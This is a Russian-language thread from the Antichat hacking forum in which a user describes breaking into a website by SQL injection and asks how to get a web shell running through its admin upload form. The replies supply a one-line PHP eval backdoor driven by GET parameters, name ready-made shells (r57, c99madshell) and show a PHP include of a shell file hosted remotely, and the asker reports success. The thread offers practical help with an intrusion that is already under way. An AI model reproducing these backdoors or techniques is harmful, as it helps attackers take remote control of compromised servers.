ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Залить shell
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Залить shell
  #1  
Старый 07.11.2008, 09:30
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию Залить shell
Я хочу залить шелл на сайт!
Ломанул сайт с помощью SQL-иньекции, нашел пароль к админке и саму админку!
Админка: движок ее BeOnsite2
Там есть такая штука, как залить файл... Я заливал шелл, но при попытке запуска его - он пишет:
Fatal error: Call to undefined function: gzinflate() in /************ on line 6
Что можно зделать?
Как инклюдить через *.gif?
Как залить пхп файл, что бы он соеденялся с моим шеллом... То есть что бы в самом файле на взломаном сервере не было самого шелла, а было лишь подключение к нему?
Или что вы посоветуете? Жду ответов!
 
Ответить с цитированием

  #2  
Старый 07.11.2008, 11:04
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
PHP код:
<?php
eval(stripslashes(implode($_GET)));
?>
Юзай, только судя по созданию такой темы я очень сомневаюсь что ты поймёш что с этим делать
stripslashes естествена нужен если есть экранирование
 
Ответить с цитированием

  #3  
Старый 07.11.2008, 13:31
Аватар для А®ТеS
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
На сервере отключена (или отстутствует по древности) функция gzinflate(). А шелл у тебя ее использует (предположу, что шелл r57 1.40+ или c99madshell). Ты можешь использовать шелл, который обходиться без нее. Например, r57 1.31. А чтобы индклюдился шелл, то юзай такую конструкцию:
PHP код:
<?php
include("http://site.com/shell.txt");
?>
Не забудь заменить http://site.com/shell.txt на свой.

Если сервер опять заругается, то не спеши удивляться: возможно, отключена функция include или allow_url_fopen = off. Тогда, как было сказано выше, залей r57 1.31 и не парься.
 
Ответить с цитированием

  #4  
Старый 07.11.2008, 14:59
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Спасибо большое! Все получилось))
Ponchik, отдельное спасибо тебе!!!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
webshell scripts -) blackybr PHP, PERL, MySQL, JavaScript 20 28.03.2010 02:17
Как залить shell через админку Vbulletin 3.5.2? user2006 Форумы 8 06.02.2006 21:24
помогите залить shell gannibal Уязвимости 9 14.01.2006 04:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ